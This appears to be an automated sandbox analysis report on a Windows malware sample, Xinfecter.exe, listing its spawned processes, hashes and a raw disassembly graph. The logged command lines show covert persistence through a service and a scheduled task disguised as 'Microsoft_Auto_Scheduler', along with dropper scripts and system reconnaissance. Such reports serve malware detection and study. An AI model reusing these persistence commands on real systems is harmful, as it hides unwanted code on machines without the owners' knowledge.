                                                                                                      Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                                                                                      Imagebase:0x730000
                                                                                                      File size:61'440 bytes
                                                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                                                                                      Imagebase:0xf70000
                                                                                                      File size:147'456 bytes
                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:20
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:21
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                                                                                      Imagebase:0x2d0000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:22
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:24
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x2c0000
                                                                                                      File size:76'800 bytes
                                                                                                      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:25
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:26
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /i "os name"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:27
                                                                                                      Start time:07:42:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:29
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:30
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:31
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /v
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:32
                                                                                                      Start time:07:42:18
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I /c "dcdcf"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:33
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:34
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:35
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:36
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x2c0000
                                                                                                      File size:76'800 bytes
                                                                                                      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:37
                                                                                                      Start time:07:42:19
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /i "original"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:38
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                                                                                      Imagebase:0x7ff6d08f0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:39
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ver
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:40
                                                                                                      Start time:07:42:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:42
                                                                                                      Start time:07:42:21
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:43
                                                                                                      Start time:07:42:21
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:44
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                                                                                      Imagebase:0x7ff7fc430000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:45
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:46
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:tasklist /v
                                                                                                      Imagebase:0x7ff785d20000
                                                                                                      File size:106'496 bytes
                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:47
                                                                                                      Start time:07:42:22
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:find /I /c "dcdcf"
                                                                                                      Imagebase:0x7ff66db80000
                                                                                                      File size:17'920 bytes
                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:48
                                                                                                      Start time:07:42:27
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                                                                                      Imagebase:0x10000
                                                                                                      File size:1'257'984 bytes
                                                                                                      MD5 hash:8F807535948B5E93317BAF48A4D0E69D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 84%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:49
                                                                                                      Start time:07:42:27
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:51
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:52
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:53
                                                                                                      Start time:07:42:35
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:54
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:55
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:56
                                                                                                      Start time:07:42:50
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:57
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:58
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:59
                                                                                                      Start time:07:43:05
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:timeout /t 15 /nobreak
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:60
                                                                                                      Start time:07:43:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                      Imagebase:0x7ff795930000
                                                                                                      File size:468'120 bytes
                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:61
                                                                                                      Start time:07:43:17
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:62
                                                                                                      Start time:07:43:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
                                                                                                      Imagebase:0x460000
                                                                                                      File size:79'360 bytes
                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:63
                                                                                                      Start time:07:43:20
                                                                                                      Start date:06/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:find /I "BiXS3FRoLe.exe"
                                                                                                      Imagebase:0x920000
                                                                                                      File size:14'848 bytes
                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:23.3%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:41
                                                                                                        execution_graph 109037 b24832 GetCurrentProcess DuplicateHandle 109038 b24882 109037->109038 109050 b2487b 109037->109050 109074 b358de 109038->109074 109041 b24a56 CloseHandle 109042 b24a5f 109041->109042 109044 b24897 109044->109050 109111 b24c8c 109044->109111 109047 b248b1 109047->109050 109175 b21daa 109047->109175 109050->109041 109050->109042 109051 b248bd ListArray 109051->109051 109123 b34d09 109051->109123 109054 b24a22 109057 b34d66 _free 20 API calls 109054->109057 109059 b24a2d 109057->109059 109058 b24a68 109188 b2514f IsProcessorFeaturePresent 109058->109188 109062 b34d66 _free 20 API calls 109059->109062 109062->109047 109063 b24a74 109065 b36be9 26 API calls 109066 b249a0 109065->109066 109066->109058 109067 b249ab 109066->109067 109150 b24b09 109067->109150 109070 b249bb CreateProcessA 109071 b24a00 CloseHandle 109070->109071 109072 b249f9 109070->109072 109071->109072 109169 b34d66 109072->109169 109075 b35902 109074->109075 109076 b358ed 109074->109076 109078 b3593d 109075->109078 109083 b35929 109075->109083 109195 b259a0 109076->109195 109079 b259a0 __dosmaperr 20 API calls 109078->109079 109081 b35942 109079->109081 109084 b259b3 __Stollx 20 API calls 109081->109084 109192 b358b6 109083->109192 109086 b3594a 109084->109086 109201 b25122 26 API calls __cftof 109086->109201 109087 b24889 109089 b3723e 109087->109089 109090 b37146 __FrameHandler3::FrameUnwindToState 109089->109090 109091 b3716e 109090->109091 109092 b3715e 109090->109092 109094 b37186 109091->109094 109095 b37176 109091->109095 109093 b259b3 __Stollx 20 API calls 109092->109093 109096 b37163 109093->109096 109098 b37226 109094->109098 109101 b371b8 109094->109101 109097 b259b3 __Stollx 20 API calls 109095->109097 109269 b25122 26 API calls __cftof 109096->109269 109103 b3717b std::_Locinfo::_Locinfo_dtor 109097->109103 109099 b259b3 __Stollx 20 API calls 109098->109099 109099->109096 109248 b34680 109101->109248 109103->109044 109106 b371dd 109107 b371f2 109106->109107 109108 b371e5 109106->109108 109268 b3721c LeaveCriticalSection std::_Xfsopen 109107->109268 109109 b259b3 __Stollx 20 API calls 109108->109109 109109->109103 109113 b24cab 109111->109113 109112 b248a7 109112->109047 109117 b24acb 109112->109117 109113->109112 109296 b36866 29 API calls 3 library calls 109113->109296 109115 b24cd5 109116 b34d66 _free 20 API calls 109115->109116 109116->109112 109297 b36b4b 109117->109297 109120 b24af2 109120->109051 109121 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109122 b24b08 109121->109122 109124 b34d16 109123->109124 109125 b34d56 109124->109125 109126 b34d41 HeapAlloc 109124->109126 109129 b34d2a std::_Locinfo::_W_Getmonths 109124->109129 109128 b259b3 __Stollx 19 API calls 109125->109128 109127 b34d54 109126->109127 109126->109129 109130 b2495b 109127->109130 109128->109130 109129->109125 109129->109126 109332 b2cfdd 7 API calls 2 library calls 109129->109332 109130->109054 109132 b321c2 109130->109132 109133 